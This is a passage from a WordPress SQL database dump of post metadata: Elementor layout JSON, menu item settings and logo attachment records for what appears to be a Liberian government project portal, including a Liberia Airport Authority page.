\",\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_width\":\"\",\"_element_width_tablet\":\"\",\"_element_width_mobile\":\"\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_vertical_align\":\"\",\"_element_vertical_align_tablet\":\"\",\"_element_vertical_align_mobile\":\"\",\"_position\":\"\",\"_offset_orientation_h\":\"start\",\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_orientation_v\":\"start\",\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2241ab5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e6ea64b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4015db0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3742cd2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ci\\\" page_length=\\\"false\\\"]\",\"_title\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_z_index\":\"\",\"_element_id\":\"\",\"_css_classes\":\"\",\"jet_family_widget_is_order_orientaion\":\"false\",\"jet_family_widget_order_orientaion\":\"\",\"jet_family_widget_order_orientaion_tablet\":\"\",\"jet_family_widget_order_orientaion_mobile\":\"\",\"jet_family_widget_is_flex_basis\":\"false\",\"jet_family_widget_flex_basis\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"jet_family_widget_flex_basis_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"jet_family_widget_flex_basis_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_animation\":\"\",\"_animation_tablet\":\"\",\"_animation_mobile\":\"\",\"animation_duration\":\"\",\"_animation_delay\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b\":\"#f2295b\",\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_type\":\"linear\",\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_gradient_position\":\"center center\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_position_tablet\":\"\",\"_background_position_mobile\":\"\",\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_repeat_tablet\":\"\",\"_background_repeat_mobile\":\"\",\"_background_size\":\"\",\"_background_size_tablet\":\"\",\"_background_size_mobile\":\"\",\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_video_link\":\"\",\"_background_video_start\":\"\",\"_background_video_end\":\"\",\"_background_play_once\":\"\",\"_background_play_on_mobile\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_slideshow_loop\":\"yes\",\"_background_slideshow_slide_duration\":5000,\"_background_slideshow_slide_transition\":\"fade\",\"_background_slideshow_transition_duration\":500,\"_background_slideshow_ken_burns\":\"\",\"_background_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_background\":\"\",\"_background_hover_color\":\"\",\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b\":\"#f2295b\",\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_type\":\"linear\",\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_gradient_position\":\"center center\",\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_position\":\"\",\"_background_hover_position_tablet\":\"\",\"_background_hover_position_mobile\":\"\",\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_attachment\":\"\",\"_background_hover_repeat\":\"\",\"_background_hover_repeat_tablet\":\"\",\"_background_hover_repeat_mobile\":\"\",\"_background_hover_size\":\"\",\"_background_hover_size_tablet\":\"\",\"_background_hover_size_mobile\":\"\",\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_video_link\":\"\",\"_background_hover_video_start\":\"\",\"_background_hover_video_end\":\"\",\"_background_hover_play_once\":\"\",\"_background_hover_play_on_mobile\":\"\",\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_background_hover_slideshow_loop\":\"yes\",\"_background_hover_slideshow_slide_duration\":5000,\"_background_hover_slideshow_slide_transition\":\"fade\",\"_background_hover_slideshow_transition_duration\":500,\"_background_hover_slideshow_ken_burns\":\"\",\"_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_box_shadow_position\":\" \",\"_border_hover_border\":\"\",\"_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_color\":\"\",\"_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_hover_box_shadow_type\":\"\",\"_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_hover_box_shadow_position\":\" \",\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_width\":\"\",\"_element_width_tablet\":\"\",\"_element_width_mobile\":\"\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_vertical_align\":\"\",\"_element_vertical_align_tablet\":\"\",\"_element_vertical_align_mobile\":\"\",\"_position\":\"\",\"_offset_orientation_h\":\"start\",\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_orientation_v\":\"start\",\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18270,2688,'_menu_item_type','custom'),(18271,2688,'_menu_item_menu_item_parent','0'),(18272,2688,'_menu_item_object_id','2688'),(18273,2688,'_menu_item_object','custom'),(18274,2688,'_menu_item_target','_blank'),(18275,2688,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18276,2688,'_menu_item_xfn',''),(18277,2688,'_menu_item_url','#'),(18279,2688,'_menu_item_template',''),(18280,2688,'_menu_item_mega_template','0'),(18281,2688,'_menu_item_nolink',''),(18282,2688,'_menu_item_category_post',''),(18283,2688,'_menu_item_megamenu',''),(18284,2688,'_menu_item_megamenu_auto_width',''),(18285,2688,'_menu_item_megamenu_col',''),(18286,2688,'_menu_item_megamenu_heading',''),(18287,2688,'_menu_item_megamenu_widgetarea','0'),(18288,2688,'_menu_item_icon',''),(18289,2688,'_elementor_controls_usage','a:0:{}'),(18290,2689,'_elementor_edit_mode','builder'),(18291,2689,'_elementor_template_type','wp-post'),(18292,2689,'_elementor_version','2.7.5'),(18293,2689,'_wp_page_template','default'),(18294,2689,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia Airport Authority Information coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cfc190\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"ef8085e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"197521f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1214e7c\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"laa\\\",\\\"tag_id\\\":\\\"55\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"laa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2241ab5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e6ea64b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4015db0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3742cd2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:laa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18295,1596,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18298,2690,'_menu_item_type','custom'),(18299,2690,'_menu_item_menu_item_parent','0'),(18300,2690,'_menu_item_object_id','2690'),(18301,2690,'_menu_item_object','custom'),(18302,2690,'_menu_item_target','_blank'),(18303,2690,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18304,2690,'_menu_item_xfn',''),(18305,2690,'_menu_item_url','http://www.cari.gov.lr/'),(18307,2690,'_menu_item_template',''),(18308,2690,'_menu_item_mega_template','0'),(18309,2690,'_menu_item_nolink',''),(18310,2690,'_menu_item_category_post',''),(18311,2690,'_menu_item_megamenu',''),(18312,2690,'_menu_item_megamenu_auto_width',''),(18313,2690,'_menu_item_megamenu_col',''),(18314,2690,'_menu_item_megamenu_heading',''),(18315,2690,'_menu_item_megamenu_widgetarea','0'),(18316,2690,'_menu_item_icon',''),(18317,2690,'_elementor_controls_usage','a:0:{}'),(18318,2692,'_elementor_controls_usage','a:0:{}'),(18320,2692,'_ca_post_type','1592'),(18321,2691,'_edit_last','1'),(18322,2691,'_elementor_controls_usage','a:0:{}'),(18323,2691,'_ca_handle','0'),(18324,2691,'_ca_host','sidebar'),(18325,2691,'_ca_merge_pos','0'),(18326,2691,'_edit_lock','1634556962:42'),(18327,2693,'_wp_attached_file','2019/11/cari_logo.png'),(18328,2693,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:285;s:6:\"height\";i:259;s:4:\"file\";s:21:\"2019/11/cari_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"cari_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18330,2695,'_menu_item_type','custom'),(18331,2695,'_menu_item_menu_item_parent','0'),(18332,2695,'_menu_item_object_id','2695'),(18333,2695,'_menu_item_object','custom'),(18334,2695,'_menu_item_target','_blank'),(18335,2695,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18336,2695,'_menu_item_xfn',''),(18337,2695,'_menu_item_url','#'),(18339,2695,'_menu_item_template',''),(18340,2695,'_menu_item_mega_template','0'),(18341,2695,'_menu_item_nolink',''),(18342,2695,'_menu_item_category_post',''),(18343,2695,'_menu_item_megamenu',''),(18344,2695,'_menu_item_megamenu_auto_width',''),(18345,2695,'_menu_item_megamenu_col',''),(18346,2695,'_menu_item_megamenu_heading',''),(18347,2695,'_menu_item_megamenu_widgetarea','0'),(18348,2695,'_menu_item_icon',''),(18349,2695,'_elementor_controls_usage','a:0:{}'),(18350,2696,'_elementor_controls_usage','a:0:{}'),(18352,2696,'_ca_post_type','1590'),(18353,2694,'_edit_last','1'),(18354,2694,'_elementor_controls_usage','a:0:{}'),(18355,2694,'_ca_handle','0'),(18356,2694,'_ca_host','sidebar'),(18357,2694,'_ca_merge_pos','0'),(18358,2694,'_edit_lock','1574523437:1'),(18360,2697,'_wp_attached_file','2019/11/nfaa_logo.png'),(18361,2697,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:285;s:6:\"height\";i:250;s:4:\"file\";s:21:\"2019/11/nfaa_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"nfaa_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18363,2698,'_menu_item_type','custom'),(18364,2698,'_menu_item_menu_item_parent','0'),(18365,2698,'_menu_item_object_id','2698'),(18366,2698,'_menu_item_object','custom'),(18367,2698,'_menu_item_target','_blank'),(18368,2698,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18369,2698,'_menu_item_xfn',''),(18370,2698,'_menu_item_url','#'),(18372,2698,'_menu_item_template',''),(18373,2698,'_menu_item_mega_template','0'),(18374,2698,'_menu_item_nolink',''),(18375,2698,'_menu_item_category_post',''),(18376,2698,'_menu_item_megamenu',''),(18377,2698,'_menu_item_megamenu_auto_width',''),(18378,2698,'_menu_item_megamenu_col',''),(18379,2698,'_menu_item_megamenu_heading',''),(18380,2698,'_menu_item_megamenu_widgetarea','0'),(18381,2698,'_menu_item_icon',''),(18382,2698,'_elementor_controls_usage','a:0:{}'),(18383,2700,'_elementor_controls_usage','a:0:{}'),(18385,2700,'_ca_post_type','1584'),(18386,2699,'_edit_last','1'),(18387,2699,'_elementor_controls_usage','a:0:{}'),(18388,2699,'_ca_handle','0'),(18389,2699,'_ca_host','sidebar'),(18390,2699,'_ca_merge_pos','0'),(18391,2699,'_edit_lock','1574524016:1'),(18392,2701,'_wp_attached_file','2019/11/mogcsp_logo.png'),(18393,2701,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:165;s:4:\"file\";s:23:\"2019/11/mogcsp_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"mogcsp_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18394,2702,'_menu_item_type','custom'),(18395,2702,'_menu_item_menu_item_parent','0'),(18396,2702,'_menu_item_object_id','2702'),(18397,2702,'_menu_item_object','custom'),(18398,2702,'_menu_item_target','_blank'),(18399,2702,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18400,2702,'_menu_item_xfn',''),(18401,2702,'_menu_item_url','http://iiu-monitor.org'),(18403,2702,'_m